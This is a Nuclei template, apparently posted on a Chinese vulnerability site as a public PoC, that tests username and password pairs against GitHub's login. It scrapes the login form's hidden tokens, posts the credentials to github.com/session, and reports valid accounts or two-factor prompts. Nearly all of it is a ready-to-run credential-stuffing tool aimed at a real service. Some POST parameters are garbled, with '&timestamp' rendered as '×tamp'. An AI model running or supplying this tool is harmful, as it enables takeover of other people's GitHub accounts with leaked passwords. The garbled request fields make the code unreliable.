漏洞描述
Checks for a valid github account.
github-login-check: Github Login Check
PoC代码[已公开]
id: github-login-check
info:
name: Github Login Check
author: parthmalhotra,pdresearch
severity: critical
description: Checks for a valid github account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 2
tags: cloud,creds-stuffing,login-check,github,vuln
self-contained: true
http:
- raw:
- |
GET https://github.com/login HTTP/1.1
Host: github.com
- |
POST https://github.com/session HTTP/1.1
Host: github.com
Origin: https://github.com
Content-Type: application/x-www-form-urlencoded
Referer: https://github.com/login
commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}}
extractors:
- type: xpath
name: authenticity_token
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/input[1]
- type: xpath
name: timestamp
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/div/input[10]
- type: xpath
name: timestamp_secret
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/div/input[11]
- type: dsl
dsl:
- username
- password
matchers-condition: or
matchers:
- type: dsl
name: 2fa
dsl:
- "contains(location, 'https://github.com/sessions/two-factor')"
- "status_code==302"
condition: and
- type: dsl
dsl:
- "contains(to_lower(header), 'set-cookie: logged_in=yes')"
- "contains(to_lower(header), 'set-cookie: user_session=')"
- "status_code==302"
condition: and
# digest: 4a0a0047304502206877f036ee535cec118c15201dbd592497509ca61d0f654831a390fcfa1f7d7b022100a66280afce3ac4050744ea5290300a98b872bdf0bbb78c9bd03df695598ffe53:922c64590222798bb761d5b6d8e72950